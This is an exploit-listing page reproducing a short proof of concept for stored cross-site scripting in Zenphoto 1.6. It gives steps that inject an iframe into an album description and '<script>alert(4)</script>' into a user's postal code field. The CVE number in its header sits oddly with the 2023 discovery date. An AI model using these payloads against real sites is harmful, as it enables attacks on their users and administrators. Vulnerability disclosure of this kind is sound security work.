Zenphoto 1.6 Cross Site Scripting

CVE Category Price Severity
CVE-2020-7755 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2023-05-27

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

Zenphoto 1.6 Cross Site Scripting
Exploit Title: Zenphoto 1.6 - Multiple stored XSS
Application: Zenphoto-1.6 xss poc
Version: 1.6 
Bugs:  XSS
Technology: PHP
Vendor URL:
Software Link:
Date of found: 01-05-2023
Author: Mirabbas Aalarov
Tested on: Linux 

2. Technical Details & POC
1. create new album 
2. write Album Description : <iframe src=""></iframe> 
3. save and view album  http://localhost/zenphoto-1.6/index.php?album=new-album or http://localhost/zenphoto-1.6/

1. go to user account and change user data (http://localhost/zenphoto-1.6/zp-core/admin-users.php?page=users)
2.change postal code  as <script>alert(4)</script>
3.if admin user information import as html , xss will trigger

poc video :

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.